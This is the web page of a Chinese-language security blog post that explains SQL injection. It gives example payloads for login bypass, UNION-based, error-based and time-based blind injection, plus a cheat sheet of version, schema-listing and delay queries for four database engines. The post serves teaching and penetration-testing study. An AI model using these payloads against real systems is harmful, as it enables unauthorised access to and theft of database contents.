<!DOCTYPE html>
<html lang="zh-TW">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin>
  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/snowflake180x180.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/snowflake32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/snowflake16x16.png">
  <link rel="mask-icon" href="/blog/images/snowflake.svg" color="#222">
  <meta name="google-site-verification" content="google76b4f15a94f05f2c.html">
  <meta name="msvalidate.01" content="BingSiteAuth.xml">

<link rel="stylesheet" href="/blog/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"poyu-liao.github.io","root":"/blog/","images":"/blog/images","scheme":"Gemini","darkmode":false,"version":"8.22.0","exturl":true,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜尋...","empty":"我們無法找到任何有關 ${query} 的搜索結果","hits_time":"找到 ${hits} 個搜索結果（用時 ${time} 毫秒）","hits":"找到 ${hits} 個搜索結果"},"path":"/blog/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false,"trigger":"auto"}}</script><script src="/blog/js/config.js"></script>

    <meta name="description" content="SQL Injection( SQLi）是一種常見的網頁安全漏洞。攻擊者利用應用程式與資料庫之間的查詢機制插入惡意的 SQL 語句，從而影響應用程式對資料庫的操作。這種攻擊方式可能導致未經授權的資料存取，甚至改變應用程式的內容或行為。">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL injection">
<meta property="og:url" content="https://poyu-liao.github.io/blog/2025/02/09/SQL-injectioni/index.html">
<meta property="og:site_name" content="Robert&#39;s Blog">
<meta property="og:description" content="SQL Injection( SQLi）是一種常見的網頁安全漏洞。攻擊者利用應用程式與資料庫之間的查詢機制插入惡意的 SQL 語句，從而影響應用程式對資料庫的操作。這種攻擊方式可能導致未經授權的資料存取，甚至改變應用程式的內容或行為。">
<meta property="og:locale" content="zh_TW">
<meta property="article:published_time" content="2025-02-09T10:27:49.000Z">
<meta property="article:modified_time" content="2025-02-09T14:29:37.708Z">
<meta property="article:author" content="Po Yu Liao">
<meta property="article:tag" content="PT">
<meta property="article:tag" content="website">
<meta property="article:tag" content="SQL">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://poyu-liao.github.io/blog/2025/02/09/SQL-injectioni/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-TW","comments":true,"permalink":"https://poyu-liao.github.io/blog/2025/02/09/SQL-injectioni/","path":"2025/02/09/SQL-injectioni/","title":"SQL injection"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>SQL injection | Robert's Blog</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-5WYW6952KH"></script>
  <script class="next-config" data-name="google_analytics" type="application/json">{"tracking_id":"G-5WYW6952KH","only_pageview":false,"measure_protocol_api_secret":null}</script>
  <script src="/blog/js/third-party/analytics/google-analytics.js"></script>







<link rel="stylesheet" type="text/css" href="/blog/css/injector/main.css" /><link rel="preload" as="style" href="/blog/css/injector/light.css" /><link rel="preload" as="style" href="/blog/css/injector/dark.css" />
  <noscript>
    <link rel="stylesheet" href="/blog/css/noscript.css">
  </noscript>
<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切換導航欄" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/blog/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Robert's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">skysnowstarshine</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜尋" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/blog/" rel="section"><i class="fa fa-home fa-fw"></i>首頁</a></li><li class="menu-item menu-item-tags"><a href="/blog/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>標籤</a></li><li class="menu-item menu-item-categories"><a href="/blog/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分類</a></li><li class="menu-item menu-item-archives"><a href="/blog/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>歸檔</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜尋
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜尋..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目錄
        </li>
        <li class="sidebar-nav-overview">
          本站概要
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-injection%E5%BD%B1%E9%9F%BF"><span class="nav-number">1.</span> <span class="nav-text">SQL Injection影響</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql%E7%9B%B8%E9%97%9C%E6%8C%87%E4%BB%A4"><span class="nav-number">2.</span> <span class="nav-text">SQL相關指令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-injection%E9%A1%9E%E5%9E%8B"><span class="nav-number">3.</span> <span class="nav-text">SQL Injection類型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql-injection%E7%AF%84%E4%BE%8B"><span class="nav-number">4.</span> <span class="nav-text">SQL injection範例:</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sql-injection-login-bypass"><span class="nav-number">4.1.</span> <span class="nav-text">SQL Injection Login Bypass</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#union-base-sql-injection"><span class="nav-number">4.2.</span> <span class="nav-text">UNION Base SQL Injection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#error-based-sql-injection"><span class="nav-number">4.3.</span> <span class="nav-text">Error-Based SQL Injection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#blind-sql-injection"><span class="nav-number">4.4.</span> <span class="nav-text">Blind SQL injection:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%B0%A1%E6%98%93sql-injection%E6%9F%A5%E8%A9%A2%E8%A1%A8"><span class="nav-number">5.</span> <span class="nav-text">簡易SQL injection查詢表</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%97%E4%B8%B2%E9%80%A3%E6%8E%A5"><span class="nav-number">5.1.</span> <span class="nav-text">字串連接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B3%87%E6%96%99%E5%BA%AB%E7%89%88%E6%9C%AC"><span class="nav-number">5.2.</span> <span class="nav-text">資料庫版本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B3%87%E6%96%99%E5%BA%AB%E5%85%A7%E5%AE%B9"><span class="nav-number">5.3.</span> <span class="nav-text">資料庫內容</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#time-delays"><span class="nav-number">5.4.</span> <span class="nav-text">Time delays</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%83%E8%80%83%E8%B3%87%E6%96%99"><span class="nav-number">6.</span> <span class="nav-text">參考資料</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Po Yu Liao"
      src="/blog/images/A.gif">
  <p class="site-author-name" itemprop="name">Po Yu Liao</p>
  <div class="site-description" itemprop="description">一位在lab吹冷氣就被封PBS之名的人!<br>現在變成社畜的從業資安人員</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/blog/archives/">
          <span class="site-state-item-count">26</span>
          <span class="site-state-item-name">文章</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/blog/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分類</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/blog/tags/">
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">標籤</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL1BvWXUtTGlhbw==" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;PoYu-Liao"><i class="fab fa-github fa-fw"></i>GitHub</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="bWFpbHRvOnBveXVsaWFvQHByb3Rvbi5tZQ==" title="E-Mail → mailto:poyuliao@proton.me"><i class="fa fa-envelope fa-fw"></i>E-Mail</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly93d3cueW91dHViZS5jb20vY2hhbm5lbC9VQzVFOExBOVZSRUp2QUNOcUVobG0zWlE=" title="YouTube → https:&#x2F;&#x2F;www.youtube.com&#x2F;channel&#x2F;UC5E8LA9VREJvACNqEhlm3ZQ"><i class="fab fa-youtube fa-fw"></i>YouTube</span>
      </span>
  </div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          連結
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <span class="exturl" data-url="aHR0cHM6Ly93d3cudGlueXRzdW5hbWkuaW5mby8=" title="https:&#x2F;&#x2F;www.tinytsunami.info&#x2F;">羊羽手札</span>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-TW">
    <link itemprop="mainEntityOfPage" href="https://poyu-liao.github.io/blog/2025/02/09/SQL-injectioni/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/blog/images/A.gif">
      <meta itemprop="name" content="Po Yu Liao">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Robert's Blog">
      <meta itemprop="description" content="一位在lab吹冷氣就被封PBS之名的人!<br>現在變成社畜的從業資安人員">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="SQL injection | Robert's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL injection
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">發表於</span>
      

      <time title="創建時間：2025-02-09 18:27:49 / 修改時間：22:29:37" itemprop="dateCreated datePublished" datetime="2025-02-09T18:27:49+08:00">2025-02-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分類於</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/blog/categories/Penetration-Test/" itemprop="url" rel="index"><span itemprop="name">Penetration Test</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/blog/categories/Security/" itemprop="url" rel="index"><span itemprop="name">Security</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>SQL Injection(
SQLi）是一種常見的網頁安全漏洞。攻擊者利用應用程式與資料庫之間的查詢機制插入惡意的
SQL
語句，從而影響應用程式對資料庫的操作。這種攻擊方式可能導致未經授權的資料存取，甚至改變應用程式的內容或行為。<br />
<span id="more"></span></p>
<h2 id="sql-injection影響">SQL Injection影響</h2>
<p>當成功執行 SQL Injection可能導致以下結果：</p>
<ul>
<li><p>未經授權的資料存取:<br />
攻擊者可以檢視原本無權存取的敏感資訊，例如：使用者帳號與密碼、信用卡資訊、個人隱私數據。<br />
</p></li>
<li><p>修改或刪除資料<br />
攻擊者可以直接變更、刪除資料庫中的資料，影響應用程式的正常運作。</p></li>
<li><p>取得管理權限<br />
攻擊者可能執行管理員級別的 SQL
指令，如新增或刪除使用者，進而掌控整個資料庫。</p></li>
<li><p>伺服器控制權限<br />
在某些情況下，攻擊者可以執行系統命令，入侵伺服器，甚至取得完整的後端基礎設施控制權。</p></li>
<li><p>持久性後門<br />
攻擊者可能在受害系統中植入後門，讓其長期存取企業內部資料，而不被察覺。</p></li>
</ul>
<h2 id="sql相關指令">SQL相關指令</h2>
<p>以下為簡易的SQL指令參數的介紹，方便以後理解SQL Injection的原理</p>
<ul>
<li>SELECT：用來從資料庫中選取數據。<br />
</li>
<li>INSERT：用來新增數據到資料表中。<br />
</li>
<li>UPDATE：用來修改資料表中的數據。<br />
</li>
<li>DELETE：用來刪除資料表中的數據。<br />
</li>
<li>JOIN：用來合併多個表的數據。<br />
</li>
<li>GROUP BY：依照指定的欄位將資料表中的行分組。<br />
</li>
<li>ORDER BY：依照指定的欄位對查詢結果進行排序。<br />
</li>
<li>WHERE：用來設定條件過濾查詢結果。</li>
<li>DISTINCT：用來去除重複數據，只回傳唯一的值。<br />
</li>
<li>COUNT：計算列中的行數或非NULL的數量。<br />
</li>
<li>SUM：用來計算總和。<br />
</li>
<li>AVG：用來計算平均值。<br />
</li>
<li>MAX：回傳某列中的最大值。<br />
</li>
<li>MIN：回傳某列中的最小值。<br />
</li>
<li>HAVING： 與 GROUP BY 搭配使用，篩選分組後的結果。<br />
</li>
<li>UNION：合併兩個或更多 SELECT 查詢的結果。<br />
</li>
<li>IN：用來查詢某欄位的值是否在給定列表中。<br />
</li>
<li>BETWEEN：用來查詢數值是否在某範圍內（包含邊界）。<br />
</li>
<li>LIKE：在某一列中搜尋指定的值。<br />
</li>
<li>EXISTS：用來檢查某條件值是否存在<br />
</li>
<li>CASE：類似 if-else 的條件判斷語句。<br />
</li>
<li>INDEX：用來加速查詢的索引。<br />
</li>
<li>PRIMARY KEY：確保每筆資料的唯一性。<br />
</li>
<li>FOREIGN KEY：用來建立表與表之間的關聯性。<br />
</li>
<li>VIEW：建立從一個或多個現有表的虛擬表。<br />
</li>
<li>LENGTH 取得字串的長度(bytes)<br />
</li>
<li>SUBSTRING 取出指定位置開始的指定長度，字串後面擺三個參數(列的名稱,
索引值第幾個位子, 字元長度)</li>
</ul>
<h2 id="sql-injection類型">SQL Injection類型</h2>
<p>SQL Injection類型常見有以下幾類:</p>
<ol type="1">
<li><p>SQL Injection Login Bypass:<br />
SQL Injection Login Bypass 是一種透過 SQL
Injection來繞過身份驗證的攻擊手法。攻擊者利用惡意輸入操控 SQL
查詢，使系統認為驗證已通過，即使未提供正確的帳號與密碼。</p></li>
<li><p>UNION Base SQL Injection:<br />
攻擊者利用 <code>UNION SELECT</code>
語句將惡意查詢結果與正常查詢合併，從而獲取其他表格的敏感資訊。</p></li>
<li><p>Error Base SQL Injection:<br />
攻擊者故意輸入錯誤
SQL指令，讓伺服器返回詳細錯誤信息，其中可能包含數據庫名稱、表格結構等關鍵資訊。</p></li>
<li><p>Blind SQL injection:<br />
當應用程式不直接返回 SQL
執行結果時，攻擊者可透過分析伺服器的回應變化來獲取資訊。</p></li>
</ol>
<h2 id="sql-injection範例">SQL injection範例:</h2>
<h3 id="sql-injection-login-bypass">SQL Injection Login Bypass</h3>
<p>假設登入頁面欄位背後執行是這樣 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE username = &#x27;admin&#x27; AND password = &#x27;password&#x27;;</span><br></pre></td></tr></table></figure>
在輸入欄位輸入以下內容</p>
<p><code>admin' --</code>和<code>' OR 1=1 -- -</code></p>
<p>會使的查詢結果變成</p>
<p><code>SELECT * FROM users WHERE username = 'admin' -- ' AND password = '';</code>
<code>SELECT * FROM users WHERE username = '' OR '1'='1' -- ' AND password = '';</code></p>
<p>透過以上參數會將後面的 AND password = '' 忽略，使查詢只檢查 username
= 'admin'。此時admin存在於資料庫，即可成功登入。</p>
<h3 id="union-base-sql-injection">UNION Base SQL Injection</h3>
<p>假設登入頁面欄位背後執行是這樣<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE username = &#x27;admin&#x27; AND password = &#x27;password&#x27;;</span><br></pre></td></tr></table></figure> 在輸入欄位輸入以下內容<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; UNION SELECT 1, &#x27;admin&#x27;, &#x27;password&#x27; -- </span><br></pre></td></tr></table></figure> 會使的查詢結果變成<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE username = &#x27;&#x27; UNION SELECT 1, &#x27;admin&#x27;, &#x27;password&#x27; -- &#x27; AND password = &#x27;&#x27;;</span><br></pre></td></tr></table></figure>
輸出結果則是攻擊者成功列舉帳號密碼，若回應中顯示用戶資訊，則可能洩露機密數據。</p>
<h3 id="error-based-sql-injection">Error-Based SQL Injection</h3>
<p>假設登入頁面欄位背後執行是這樣<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id = 1;</span><br></pre></td></tr></table></figure> 會使的查詢結果變成<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@version), 0x7e, FLOOR(RAND(0)*2)) AS a FROM information_schema.tables GROUP BY a) x) -- </span><br></pre></td></tr></table></figure></p>
<p>輸出結果可能會顯示出當前資料庫版本</p>
<h3 id="blind-sql-injection">Blind SQL injection:</h3>
<p>假設登入頁面欄位背後執行是這樣<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT name FROM users WHERE id = &#x27;1&#x27;;</span><br></pre></td></tr></table></figure> 會使的查詢結果變成<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; AND IF(ASCII(SUBSTRING((SELECT database()),1,1))=116, SLEEP(5), 0) --  </span><br></pre></td></tr></table></figure> 如果伺服器回應延遲 5 秒，表示資料庫名稱的第一個字母為
t（ASCII 為 116），攻擊者可以逐字獲取資料庫名稱。</p>
<h2 id="簡易sql-injection查詢表">簡易SQL injection查詢表</h2>
<h3 id="字串連接">字串連接</h3>
<p>將多個字串連接在一起以產生單個字串<br />
Oracle <code>'foo'||'bar'</code><br />
Microsoft <code>'foo'+'bar'</code><br />
PostgreSQL <code>'foo'||'bar'</code><br />
MySQL <code>'foo' 'bar'</code></p>
<h3 id="資料庫版本">資料庫版本</h3>
<p>查詢資料庫版本<br />
Oracle <code>SELECT banner FROM v$version</code>
<code>SELECT version FROM v$instance</code><br />
Microsoft <code>SELECT @@version</code><br />
PostgreSQL <code>SELECT version()</code><br />
MySQL <code>SELECT @@version</code></p>
<h3 id="資料庫內容">資料庫內容</h3>
<p>列出資料庫中存在的表以及這些表包含的列。<br />
Oracle<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM all_tables</span><br><span class="line">SELECT * FROM all_tab_columns WHERE table_name = &#x27;TABLE-NAME-HERE&#x27;</span><br></pre></td></tr></table></figure> Microsoft<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM information_schema.tables</span><br><span class="line">SELECT * FROM information_schema.columns WHERE table_name = &#x27;TABLE-NAME-HERE&#x27;</span><br></pre></td></tr></table></figure></p>
<p>PostgreSQL<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM information_schema.tables</span><br><span class="line">SELECT * FROM information_schema.columns WHERE table_name = &#x27;TABLE-NAME-HERE&#x27;</span><br></pre></td></tr></table></figure> MySQL<br />
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM information_schema.tables</span><br><span class="line">SELECT * FROM information_schema.columns WHERE table_name = &#x27;TABLE-NAME-HERE&#x27;</span><br></pre></td></tr></table></figure></p>
<h3 id="time-delays">Time delays</h3>
<p>無條件延遲 10 秒。<br />
Oracle <code>dbms_pipe.receive_message(('a'),10)</code><br />
Microsoft <code>WAITFOR DELAY '0:0:10'</code><br />
PostgreSQL <code>SELECT pg_sleep(10)</code><br />
MySQL <code>SELECT SLEEP(10)</code></p>
<h2 id="參考資料">參考資料</h2>
<ol type="1">
<li>Avoid “OR 1=1” in SQL Injections<br />
<span class="exturl" data-url="aHR0cHM6Ly90Y20tc2VjLmNvbS9hdm9pZC1vci0xLWVxdWFscy0xLWluLXNxbC1pbmplY3Rpb25zLw==">https://tcm-sec.com/avoid-or-1-equals-1-in-sql-injections/<i class="fa fa-external-link-alt"></i></span><br />
</li>
<li>SQL Injection Attack: How It Works, Examples and Prevention<br />
<span class="exturl" data-url="aHR0cHM6Ly9icmlnaHRzZWMuY29tL2Jsb2cvc3FsLWluamVjdGlvbi1hdHRhY2svI25vdGFibGUtdnVsbmVyYWJpbGl0aWVz">https://brightsec.com/blog/sql-injection-attack/#notable-vulnerabilities<i class="fa fa-external-link-alt"></i></span><br />
</li>
<li><span class="exturl" data-url="aHR0cHM6Ly9lbi5oYWNrcy5nci9zcWwtaW5qZWN0aW9udCVjZiU4MCVjZSViZiVjZSViOS0lY2UlYmElY2UlYjElY2UlYjktJWNmJTgwJWNlJWIxJWNmJTgxJWNlJWIxJWNlJWI0JWNlJWI1JWNlJWIzJWNlJWJjJWNlJWIxJWNmJTg0JWNlJWIxLw==">Mastering
SQL Injection: The Ultimate Guide To Types, Examples And Coping
Strategies!<i class="fa fa-external-link-alt"></i></span><br />
</li>
<li><span class="exturl" data-url="aHR0cHM6Ly9wb3J0c3dpZ2dlci5uZXQvd2ViLXNlY3VyaXR5L3NxbC1pbmplY3Rpb24jd2hhdC1pcy1zcWwtaW5qZWN0aW9uLXNxbGk=">https://portswigger.net/web-security/sql-injection#what-is-sql-injection-sqli<i class="fa fa-external-link-alt"></i></span></li>
</ol>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/blog/tags/PT/" rel="tag"># PT</a>
              <a href="/blog/tags/website/" rel="tag"># website</a>
              <a href="/blog/tags/SQL/" rel="tag"># SQL</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/blog/2024/07/28/DOTandDOH-notes/" rel="prev" title="安全DNS保護協定DOT和DOH">
                  <i class="fa fa-angle-left"></i> 安全DNS保護協定DOT和DOH
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/blog/2025/02/09/Cybersecurity-PT-GPT/" rel="next" title="Cybersecurity 專門的AI工具">
                  Cybersecurity 專門的AI工具 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments gitalk-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-snowflake"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Po Yu Liao</span>
  </div>
  <div class="powered-by">由 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & <span class="exturl" data-url="aHR0cHM6Ly90aGVtZS1uZXh0LmpzLm9yZw==">NexT.Gemini</span> 強力驅動
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
<script src="/blog/js/comments.js"></script><script src="/blog/js/utils.js"></script><script src="/blog/js/motion.js"></script><script src="/blog/js/sidebar.js"></script><script src="/blog/js/next-boot.js"></script><script src="/blog/js/bookmark.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/blog/js/third-party/search/local-search.js"></script>







  




  

  <script class="next-config" data-name="enableMath" type="application/json">true</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","cdn":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.7/MathJax.js?config=TeX-MML-AM_CHTML","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/blog/js/third-party/math/mathjax.js"></script>


  <script src="https://cdnjs.cloudflare.com/ajax/libs/quicklink/2.3.0/quicklink.umd.js" integrity="sha256-yvJQOINiH9fWemHn0vCA5lsHWJaHs6/ZmO+1Ft04SvM=" crossorigin="anonymous"></script>
  <script class="next-config" data-name="quicklink" type="application/json">{"enable":true,"home":true,"archive":true,"delay":true,"timeout":3000,"priority":true,"url":"https://poyu-liao.github.io/blog/2025/02/09/SQL-injectioni/"}</script>
  <script src="/blog/js/third-party/quicklink.js"></script>
<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '64px',
  right: 'unset',
  left: '32px',
  time: '0.5s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
